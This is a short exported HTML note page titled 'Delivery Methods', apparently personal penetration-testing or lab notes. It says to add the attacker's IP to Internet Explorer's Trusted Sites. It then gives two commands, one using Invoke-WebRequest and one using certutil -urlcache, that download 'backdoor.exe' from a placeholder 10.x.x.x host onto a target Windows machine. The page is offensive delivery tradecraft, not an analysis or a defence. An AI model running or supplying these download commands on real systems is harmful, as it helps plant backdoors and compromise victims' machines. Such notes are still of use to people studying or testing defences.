<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../../style.css">
    <base target="_parent">
    <title data-trilium-title>Delivery Methods</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>Delivery Methods</h1>

      <div class="ck-content">
        <p>But first, go to Internet Explorer settings and choose "Internet Options".</p>
        <figure
        class="image image_resized" style="width:24.27%">
          <img src="Delivery%20Methods/1_image.png" />
          </figure>
          <p>Click on the "Security" tab, select "Trusted Sites" and then click on
            the "Sites" button. Fill the "Add this website to the zone" field with
            your IP address and click the "Add" button.</p>
          <figure class="image image_resized"
          style="width:63.85%">
            <img src="Delivery%20Methods/2_image.png" />
          </figure>
          <p><code>Invoke-WebRequest http://10.x.x.x/backdoor.exe</code>

            <br /><code>certutil -urlcache -split -f http://10.x.x.x/backdoor.exe</code>

          </p>
      </div>
    </div>
  </body>

</html>